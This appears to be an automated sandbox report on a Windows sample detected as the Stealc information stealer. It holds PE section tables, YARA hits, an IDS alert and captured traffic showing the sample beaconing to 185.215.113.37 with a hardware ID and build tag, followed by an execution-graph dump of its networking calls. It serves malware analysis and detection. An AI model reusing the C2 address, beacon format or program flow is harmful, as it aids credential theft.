                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 6bf51c2b32aa35e28f728389f2d2702b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      (unnamed) | 0x25e000 | 0x2a3000 | 0x200 | 0e7e9721f84525a3139d4f418409059d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xxhfjhyx | 0x501000 | 0x1a2000 | 0x1a2000 | 197a9cbe7317aee800fc62b29e03bdfa | False | 0.9949629934210527 | data | 7.954667579008987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      wyglidst | 0x6a3000 | 0x1000 | 0x600 | f99e2c2c3ccfb6f783ab1921a416e894 | False | 0.63671875 | data | 5.393600932904426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x6a4000 | 0x3000 | 0x2200 | 543c71d78cb4774821ed89c534ef66f8 | False | 0.06583180147058823 | DOS executable (COM) | 0.7636120967060158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-09-30T08:57:57.444979+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Sep 30, 2024 08:57:56.521555901 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      Sep 30, 2024 08:57:56.526629925 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                      Sep 30, 2024 08:57:56.526727915 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      Sep 30, 2024 08:57:56.527216911 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      Sep 30, 2024 08:57:56.532088041 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                      Sep 30, 2024 08:57:57.217255116 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                      Sep 30, 2024 08:57:57.217339993 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      Sep 30, 2024 08:57:57.219090939 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      Sep 30, 2024 08:57:57.224085093 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                      Sep 30, 2024 08:57:57.444600105 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                      Sep 30, 2024 08:57:57.444978952 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      Sep 30, 2024 08:58:00.430322886 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      • 185.215.113.37
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6996 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 30, 2024 08:57:56.527216911 CEST | 89 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Sep 30, 2024 08:57:57.217255116 CEST | 203 | IN | HTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 06:57:57 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Sep 30, 2024 08:57:57.219090939 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 37 41 44 44 37 30 35 45 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a
                      Data Ascii: ------EGDGIIJJECFIDHJJKKFC
                      Content-Disposition: form-data; name="hwid"
                      CD7ADD705E7F2148772887
                      ------EGDGIIJJECFIDHJJKKFC
                      Content-Disposition: form-data; name="build"
                      doma
                      ------EGDGIIJJECFIDHJJKKFC--
                      Sep 30, 2024 08:57:57.444600105 CEST | 210 | IN | HTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 06:57:57 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=



                      Target ID:0
                      Start time:02:57:53
                      Start date:30/09/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x5e0000
                      File size:1'868'800 bytes
                      MD5 hash:F74ED5926C551EA89E49D964E729E736
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:7.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:2.9%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:25
14414->14415 14416 5e45c0 2 API calls 14415->14416 14417 5e41f3 14416->14417 14418 5e45c0 2 API calls 14417->14418 14419 5e420c 14418->14419 14420 5e45c0 2 API calls 14419->14420 14421 5e4225 14420->14421 14422 5e45c0 2 API calls 14421->14422 14423 5e423e 14422->14423 14424 5e45c0 2 API calls 14423->14424 14425 5e4257 14424->14425 14426 5e45c0 2 API calls 14425->14426 14427 5e4270 14426->14427 14428 5e45c0 2 API calls 14427->14428 14429 5e4289 14428->14429 14430 5e45c0 2 API calls 14429->14430 14431 5e42a2 14430->14431 14432 5e45c0 2 API calls 14431->14432 14433 5e42bb 14432->14433 14434 5e45c0 2 API calls 14433->14434 14435 5e42d4 14434->14435 14436 5e45c0 2 API calls 14435->14436 14437 5e42ed 14436->14437 14438 5e45c0 2 API calls 14437->14438 14439 5e4306 14438->14439 14440 5e45c0 2 API calls 14439->14440 14441 5e431f 14440->14441 14442 5e45c0 2 API calls 14441->14442 14443 5e4338 14442->14443 14444 5e45c0 2 API calls 14443->14444 14445 5e4351 14444->14445 14446 5e45c0 2 API calls 14445->14446 14447 5e436a 14446->14447 14448 5e45c0 2 API calls 14447->14448 14449 5e4383 14448->14449 14450 5e45c0 2 API calls 14449->14450 14451 5e439c 14450->14451 14452 5e45c0 2 API calls 14451->14452 14453 5e43b5 14452->14453 14454 5e45c0 2 API calls 14453->14454 14455 5e43ce 14454->14455 14456 5e45c0 2 API calls 14455->14456 14457 5e43e7 14456->14457 14458 5e45c0 2 API calls 14457->14458 14459 5e4400 14458->14459 14460 5e45c0 2 API calls 14459->14460 14461 5e4419 14460->14461 14462 5e45c0 2 API calls 14461->14462 14463 5e4432 14462->14463 14464 5e45c0 2 API calls 14463->14464 14465 5e444b 14464->14465 14466 5e45c0 2 API calls 14465->14466 14467 5e4464 14466->14467 14468 5e45c0 2 API calls 14467->14468 14469 5e447d 14468->14469 14470 5e45c0 2 API calls 14469->14470 14471 5e4496 14470->14471 14472 5e45c0 2 API calls 14471->14472 14473 5e44af 14472->14473 14474 5e45c0 2 API calls 14473->14474 14475 5e44c8 14474->14475 14476 5e45c0 2 API calls 14475->14476 14477 5e44e1 14476->14477 
14478 5e45c0 2 API calls 14477->14478 14479 5e44fa 14478->14479 14480 5e45c0 2 API calls 14479->14480 14481 5e4513 14480->14481 14482 5e45c0 2 API calls 14481->14482 14483 5e452c 14482->14483 14484 5e45c0 2 API calls 14483->14484 14485 5e4545 14484->14485 14486 5e45c0 2 API calls 14485->14486 14487 5e455e 14486->14487 14488 5e45c0 2 API calls 14487->14488 14489 5e4577 14488->14489 14490 5e45c0 2 API calls 14489->14490 14491 5e4590 14490->14491 14492 5e45c0 2 API calls 14491->14492 14493 5e45a9 14492->14493 14494 5f9c10 14493->14494 14495 5fa036 8 API calls 14494->14495 14496 5f9c20 43 API calls 14494->14496 14497 5fa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14495->14497 14498 5fa146 14495->14498 14496->14495 14497->14498 14499 5fa216 14498->14499 14500 5fa153 8 API calls 14498->14500 14501 5fa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14499->14501 14502 5fa298 14499->14502 14500->14499 14501->14502 14503 5fa337 14502->14503 14504 5fa2a5 6 API calls 14502->14504 14505 5fa41f 14503->14505 14506 5fa344 9 API calls 14503->14506 14504->14503 14507 5fa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14505->14507 14508 5fa4a2 14505->14508 14506->14505 14507->14508 14509 5fa4dc 14508->14509 14510 5fa4ab GetProcAddress GetProcAddress 14508->14510 14511 5fa515 14509->14511 14512 5fa4e5 GetProcAddress GetProcAddress 14509->14512 14510->14509 14513 5fa612 14511->14513 14514 5fa522 10 API calls 14511->14514 14512->14511 14515 5fa67d 14513->14515 14516 5fa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14513->14516 14514->14513 14517 5fa69e 14515->14517 14518 5fa686 GetProcAddress 14515->14518 14516->14515 14519 5f5ca3 14517->14519 14520 5fa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14517->14520 14518->14517 14521 5e1590 14519->14521 14520->14519 15641 5e1670 14521->15641 14524 5fa7a0 lstrcpy 14525 5e15b5 14524->14525 14526 5fa7a0 lstrcpy 
14525->14526 14527 5e15c7 14526->14527 14528 5fa7a0 lstrcpy 14527->14528 14529 5e15d9 14528->14529 14530 5fa7a0 lstrcpy 14529->14530 14531 5e1663 14530->14531 14532 5f5510 14531->14532 14533 5f5521 14532->14533 14534 5fa820 2 API calls 14533->14534 14535 5f552e 14534->14535 14536 5fa820 2 API calls 14535->14536 14537 5f553b 14536->14537 14538 5fa820 2 API calls 14537->14538 14539 5f5548 14538->14539 14540 5fa740 lstrcpy 14539->14540 14541 5f5555 14540->14541 14542 5fa740 lstrcpy 14541->14542 14543 5f5562 14542->14543 14544 5fa740 lstrcpy 14543->14544 14545 5f556f 14544->14545 14546 5fa740 lstrcpy 14545->14546 14566 5f557c 14546->14566 14547 5f51f0 20 API calls 14547->14566 14548 5f5643 StrCmpCA 14548->14566 14549 5f56a0 StrCmpCA 14550 5f57dc 14549->14550 14549->14566 14551 5fa8a0 lstrcpy 14550->14551 14552 5f57e8 14551->14552 14553 5fa820 2 API calls 14552->14553 14556 5f57f6 14553->14556 14554 5fa740 lstrcpy 14554->14566 14555 5fa820 lstrlen lstrcpy 14555->14566 14558 5fa820 2 API calls 14556->14558 14557 5f5856 StrCmpCA 14559 5f5991 14557->14559 14557->14566 14562 5f5805 14558->14562 14561 5fa8a0 lstrcpy 14559->14561 14560 5fa8a0 lstrcpy 14560->14566 14563 5f599d 14561->14563 14564 5e1670 lstrcpy 14562->14564 14565 5fa820 2 API calls 14563->14565 14586 5f5811 14564->14586 14567 5f59ab 14565->14567 14566->14547 14566->14548 14566->14549 14566->14554 14566->14555 14566->14557 14566->14560 14568 5f5a0b StrCmpCA 14566->14568 14576 5e1590 lstrcpy 14566->14576 14579 5f52c0 25 API calls 14566->14579 14582 5f578a StrCmpCA 14566->14582 14584 5f593f StrCmpCA 14566->14584 14585 5fa7a0 lstrcpy 14566->14585 14569 5fa820 2 API calls 14567->14569 14570 5f5a28 14568->14570 14571 5f5a16 Sleep 14568->14571 14572 5f59ba 14569->14572 14573 5fa8a0 lstrcpy 14570->14573 14571->14566 14574 5e1670 lstrcpy 14572->14574 14575 5f5a34 14573->14575 14574->14586 14577 5fa820 2 API calls 14575->14577 14576->14566 14578 5f5a43 14577->14578 14580 5fa820 2 API calls 14578->14580 14579->14566 14581 
5f5a52 14580->14581 14583 5e1670 lstrcpy 14581->14583 14582->14566 14583->14586 14584->14566 14585->14566 14586->13639 14588 5f754c 14587->14588 14589 5f7553 GetVolumeInformationA 14587->14589 14588->14589 14590 5f7591 14589->14590 14591 5f75fc GetProcessHeap RtlAllocateHeap 14590->14591 14592 5f7619 14591->14592 14593 5f7628 wsprintfA 14591->14593 14594 5fa740 lstrcpy 14592->14594 14595 5fa740 lstrcpy 14593->14595 14596 5f5da7 14594->14596 14595->14596 14596->13660 14598 5fa7a0 lstrcpy 14597->14598 14599 5e4899 14598->14599 15650 5e47b0 14599->15650 14601 5e48a5 14602 5fa740 lstrcpy 14601->14602 14603 5e48d7 14602->14603 14604 5fa740 lstrcpy 14603->14604 14605 5e48e4 14604->14605 14606 5fa740 lstrcpy 14605->14606 14607 5e48f1 14606->14607 14608 5fa740 lstrcpy 14607->14608 14609 5e48fe 14608->14609 14610 5fa740 lstrcpy 14609->14610 14611 5e490b InternetOpenA StrCmpCA 14610->14611 14612 5e4944 14611->14612 14613 5e4ecb InternetCloseHandle 14612->14613 14614 5e4955 14612->14614 14616 5e4ee8 14613->14616 15661 5f8b60 14614->15661 15656 5e9ac0 CryptStringToBinaryA 14616->15656 14617 5e4963 15669 5fa920 14617->15669 14620 5e4976 14622 5fa8a0 lstrcpy 14620->14622 14627 5e497f 14622->14627 14623 5fa820 2 API calls 14624 5e4f05 14623->14624 14626 5fa9b0 4 API calls 14624->14626 14625 5e4f27 codecvt 14629 5fa7a0 lstrcpy 14625->14629 14628 5e4f1b 14626->14628 14631 5fa9b0 4 API calls 14627->14631 14630 5fa8a0 lstrcpy 14628->14630 14642 5e4f57 14629->14642 14630->14625 14632 5e49a9 14631->14632 14633 5fa8a0 lstrcpy 14632->14633 14634 5e49b2 14633->14634 14635 5fa9b0 4 API calls 14634->14635 14636 5e49d1 14635->14636 14637 5fa8a0 lstrcpy 14636->14637 14638 5e49da 14637->14638 14639 5fa920 3 API calls 14638->14639 14640 5e49f8 14639->14640 14641 5fa8a0 lstrcpy 14640->14641 14643 5e4a01 14641->14643 14642->13663 14644 5fa9b0 4 API calls 14643->14644 14645 5e4a20 14644->14645 14646 5fa8a0 lstrcpy 14645->14646 14647 5e4a29 14646->14647 14648 5fa9b0 4 API calls 14647->14648 14649 
5e4a48 14648->14649 14650 5fa8a0 lstrcpy 14649->14650 14651 5e4a51 14650->14651 14652 5fa9b0 4 API calls 14651->14652 14653 5e4a7d 14652->14653 14654 5fa920 3 API calls 14653->14654 14655 5e4a84 14654->14655 14656 5fa8a0 lstrcpy 14655->14656 14657 5e4a8d 14656->14657 14658 5e4aa3 InternetConnectA 14657->14658 14658->14613 14659 5e4ad3 HttpOpenRequestA 14658->14659 14661 5e4ebe InternetCloseHandle 14659->14661 14662 5e4b28 14659->14662 14661->14613 14663 5fa9b0 4 API calls 14662->14663 14664 5e4b3c 14663->14664 14665 5fa8a0 lstrcpy 14664->14665 14666 5e4b45 14665->14666 14667 5fa920 3 API calls 14666->14667 14668 5e4b63 14667->14668 14669 5fa8a0 lstrcpy 14668->14669 14670 5e4b6c 14669->14670 14671 5fa9b0 4 API calls 14670->14671 14672 5e4b8b 14671->14672 14673 5fa8a0 lstrcpy 14672->14673 14674 5e4b94 14673->14674 14675 5fa9b0 4 API calls 14674->14675 14676 5e4bb5 14675->14676 14677 5fa8a0 lstrcpy 14676->14677 14678 5e4bbe 14677->14678 14679 5fa9b0 4 API calls 14678->14679 14680 5e4bde 14679->14680 14681 5fa8a0 lstrcpy 14680->14681 14682 5e4be7 14681->14682 14683 5fa9b0 4 API calls 14682->14683 14684 5e4c06 14683->14684 14685 5fa8a0 lstrcpy 14684->14685 14686 5e4c0f 14685->14686 14687 5fa920 3 API calls 14686->14687 14688 5e4c2d 14687->14688 14689 5fa8a0 lstrcpy 14688->14689 14690 5e4c36 14689->14690 14691 5fa9b0 4 API calls 14690->14691 14692 5e4c55 14691->14692 14693 5fa8a0 lstrcpy 14692->14693 14694 5e4c5e 14693->14694 14695 5fa9b0 4 API calls 14694->14695 14696 5e4c7d 14695->14696 14697 5fa8a0 lstrcpy 14696->14697 14698 5e4c86 14697->14698 14699 5fa920 3 API calls 14698->14699 14700 5e4ca4 14699->14700 14701 5fa8a0 lstrcpy 14700->14701 14702 5e4cad 14701->14702 14703 5fa9b0 4 API calls 14702->14703 14704 5e4ccc 14703->14704 14705 5fa8a0 lstrcpy 14704->14705 14706 5e4cd5 14705->14706 14707 5fa9b0 4 API calls 14706->14707 14708 5e4cf6 14707->14708 14709 5fa8a0 lstrcpy 14708->14709 14710 5e4cff 14709->14710 14711 5fa9b0 4 API calls 14710->14711 14712 5e4d1f 
14711->14712 14713 5fa8a0 lstrcpy 14712->14713 14714 5e4d28 14713->14714 14715 5fa9b0 4 API calls 14714->14715 14716 5e4d47 14715->14716 14717 5fa8a0 lstrcpy 14716->14717 14718 5e4d50 14717->14718 14719 5fa920 3 API calls 14718->14719 14720 5e4d6e 14719->14720 14721 5fa8a0 lstrcpy 14720->14721 14722 5e4d77 14721->14722 14723 5fa740 lstrcpy 14722->14723 14724 5e4d92 14723->14724 14725 5fa920 3 API calls 14724->14725 14726 5e4db3 14725->14726 14727 5fa920 3 API calls 14726->14727 14728 5e4dba 14727->14728 14729 5fa8a0 lstrcpy 14728->14729 14730 5e4dc6 14729->14730 14731 5e4de7 lstrlen 14730->14731 14732 5e4dfa 14731->14732 14733 5e4e03 lstrlen 14732->14733 15675 5faad0 14733->15675 14735 5e4e13 HttpSendRequestA 14736 5e4e32 InternetReadFile 14735->14736 14737 5e4e67 InternetCloseHandle 14736->14737 14742 5e4e5e 14736->14742 14739 5fa800 14737->14739 14739->14661 14740 5fa9b0 4 API calls 14740->14742 14741 5fa8a0 lstrcpy 14741->14742 14742->14736 14742->14737 14742->14740 14742->14741 15677 5faad0 14743->15677 14745 5f17c4 StrCmpCA 14746 5f17cf ExitProcess 14745->14746 14748 5f17d7 14745->14748 14747 5f19c2 14747->13665 14748->14747 14749 5f187f StrCmpCA 14748->14749 14750 5f185d StrCmpCA 14748->14750 14751 5f1913 StrCmpCA 14748->14751 14752 5f1932 StrCmpCA 14748->14752 14753 5f18f1 StrCmpCA 14748->14753 14754 5f1951 StrCmpCA 14748->14754 14755 5f1970 StrCmpCA 14748->14755 14756 5f18cf StrCmpCA 14748->14756 14757 5f18ad StrCmpCA 14748->14757 14758 5fa820 lstrlen lstrcpy 14748->14758 14749->14748 14750->14748 14751->14748 14752->14748 14753->14748 14754->14748 14755->14748 14756->14748 14757->14748 14758->14748 14760 5fa7a0 lstrcpy 14759->14760 14761 5e5979 14760->14761 14762 5e47b0 2 API calls 14761->14762 14763 5e5985 14762->14763 14764 5fa740 lstrcpy 14763->14764 14765 5e59ba 14764->14765 14766 5fa740 lstrcpy 14765->14766 14767 5e59c7 14766->14767 14768 5fa740 lstrcpy 14767->14768 14769 5e59d4 14768->14769 14770 5fa740 lstrcpy 14769->14770 14771 5e59e1 14770->14771 
14772 5fa740 lstrcpy 14771->14772 14773 5e59ee InternetOpenA StrCmpCA 14772->14773 14774 5e5a1d 14773->14774 14775 5e5fc3 InternetCloseHandle 14774->14775 14776 5f8b60 3 API calls 14774->14776 14777 5e5fe0 14775->14777 14778 5e5a3c 14776->14778 14780 5e9ac0 4 API calls 14777->14780 14779 5fa920 3 API calls 14778->14779 14781 5e5a4f 14779->14781 14782 5e5fe6 14780->14782 14783 5fa8a0 lstrcpy 14781->14783 14784 5fa820 2 API calls 14782->14784 14787 5e601f codecvt 14782->14787 14788 5e5a58 14783->14788 14785 5e5ffd 14784->14785 14786 5fa9b0 4 API calls 14785->14786 14789 5e6013 14786->14789 14791 5fa7a0 lstrcpy 14787->14791 14792 5fa9b0 4 API calls 14788->14792 14790 5fa8a0 lstrcpy 14789->14790 14790->14787 14800 5e604f 14791->14800 14793 5e5a82 14792->14793 14794 5fa8a0 lstrcpy 14793->14794 14795 5e5a8b 14794->14795 14796 5fa9b0 4 API calls 14795->14796 14797 5e5aaa 14796->14797 14798 5fa8a0 lstrcpy 14797->14798 14799 5e5ab3 14798->14799 14801 5fa920 3 API calls 14799->14801 14800->13671 14802 5e5ad1 14801->14802 14803 5fa8a0 lstrcpy 14802->14803 14804 5e5ada 14803->14804 14805 5fa9b0 4 API calls 14804->14805 14806 5e5af9 14805->14806 14807 5fa8a0 lstrcpy 14806->14807 14808 5e5b02 14807->14808 14809 5fa9b0 4 API calls 14808->14809 14810 5e5b21 14809->14810 14811 5fa8a0 lstrcpy 14810->14811 14812 5e5b2a 14811->14812 14813 5fa9b0 4 API calls 14812->14813 14814 5e5b56 14813->14814 14815 5fa920 3 API calls 14814->14815 14816 5e5b5d 14815->14816 14817 5fa8a0 lstrcpy 14816->14817 14818 5e5b66 14817->14818 14819 5e5b7c InternetConnectA 14818->14819 14819->14775 14820 5e5bac HttpOpenRequestA 14819->14820 14822 5e5c0b 14820->14822 14823 5e5fb6 InternetCloseHandle 14820->14823 14824 5fa9b0 4 API calls 14822->14824 14823->14775 14825 5e5c1f 14824->14825 14826 5fa8a0 lstrcpy 14825->14826 14827 5e5c28 14826->14827 14828 5fa920 3 API calls 14827->14828 14829 5e5c46 14828->14829 14830 5fa8a0 lstrcpy 14829->14830 14831 5e5c4f 14830->14831 14832 5fa9b0 4 API calls 14831->14832 14833 
5e5c6e 14832->14833 14834 5fa8a0 lstrcpy 14833->14834 14835 5e5c77 14834->14835 14836 5fa9b0 4 API calls 14835->14836 14837 5e5c98 14836->14837 14838 5fa8a0 lstrcpy 14837->14838 14839 5e5ca1 14838->14839 14840 5fa9b0 4 API calls 14839->14840 14841 5e5cc1 14840->14841 14842 5fa8a0 lstrcpy 14841->14842 14843 5e5cca 14842->14843 14844 5fa9b0 4 API calls 14843->14844 14845 5e5ce9 14844->14845 14846 5fa8a0 lstrcpy 14845->14846 14847 5e5cf2 14846->14847 14848 5fa920 3 API calls 14847->14848 14849 5e5d10 14848->14849 14850 5fa8a0 lstrcpy 14849->14850 14851 5e5d19 14850->14851 14852 5fa9b0 4 API calls 14851->14852 14853 5e5d38 14852->14853 14854 5fa8a0 lstrcpy 14853->14854 14855 5e5d41 14854->14855 14856 5fa9b0 4 API calls 14855->14856 14857 5e5d60 14856->14857 14858 5fa8a0 lstrcpy 14857->14858 14859 5e5d69 14858->14859 14860 5fa920 3 API calls 14859->14860 14861 5e5d87 14860->14861 14862 5fa8a0 lstrcpy 14861->14862 14863 5e5d90 14862->14863 14864 5fa9b0 4 API calls 14863->14864 14865 5e5daf 14864->14865 14866 5fa8a0 lstrcpy 14865->14866 14867 5e5db8 14866->14867 14868 5fa9b0 4 API calls 14867->14868 14869 5e5dd9 14868->14869 14870 5fa8a0 lstrcpy 14869->14870 14871 5e5de2 14870->14871 14872 5fa9b0 4 API calls 14871->14872 14873 5e5e02 14872->14873 14874 5fa8a0 lstrcpy 14873->14874 14875 5e5e0b 14874->14875 14876 5fa9b0 4 API calls 14875->14876 14877 5e5e2a 14876->14877 14878 5fa8a0 lstrcpy 14877->14878 14879 5e5e33 14878->14879 14880 5fa920 3 API calls 14879->14880 14881 5e5e54 14880->14881 14882 5fa8a0 lstrcpy 14881->14882 14883 5e5e5d 14882->14883 14884 5e5e70 lstrlen 14883->14884 15678 5faad0 14884->15678 14886 5e5e81 lstrlen GetProcessHeap RtlAllocateHeap 15679 5faad0 14886->15679 14888 5e5eae lstrlen 14889 5e5ebe 14888->14889 14890 5e5ed7 lstrlen 14889->14890 14891 5e5ee7 14890->14891 14892 5e5ef0 lstrlen 14891->14892 14893 5e5f03 14892->14893 14894 5e5f1a lstrlen 14893->14894 15680 5faad0 14894->15680 14896 5e5f2a HttpSendRequestA 14897 5e5f35 InternetReadFile 
14896->14897 14898 5e5f6a InternetCloseHandle 14897->14898 14902 5e5f61 14897->14902 14898->14823 14900 5fa9b0 4 API calls 14900->14902 14901 5fa8a0 lstrcpy 14901->14902 14902->14897 14902->14898 14902->14900 14902->14901 14904 5f1077 14903->14904 14905 5f1151 14904->14905 14906 5fa820 lstrlen lstrcpy 14904->14906 14905->13673 14906->14904 14908 5f0db7 14907->14908 14909 5f0f17 14908->14909 14910 5f0e27 StrCmpCA 14908->14910 14911 5f0e67 StrCmpCA 14908->14911 14912 5f0ea4 StrCmpCA 14908->14912 14913 5fa820 lstrlen lstrcpy 14908->14913 14909->13681 14910->14908 14911->14908 14912->14908 14913->14908 14917 5f0f67 14914->14917 14915 5f1044 14915->13689 14916 5f0fb2 StrCmpCA 14916->14917 14917->14915 14917->14916 14918 5fa820 lstrlen lstrcpy 14917->14918 14918->14917 14920 5fa740 lstrcpy 14919->14920 14921 5f1a26 14920->14921 14922 5fa9b0 4 API calls 14921->14922 14923 5f1a37 14922->14923 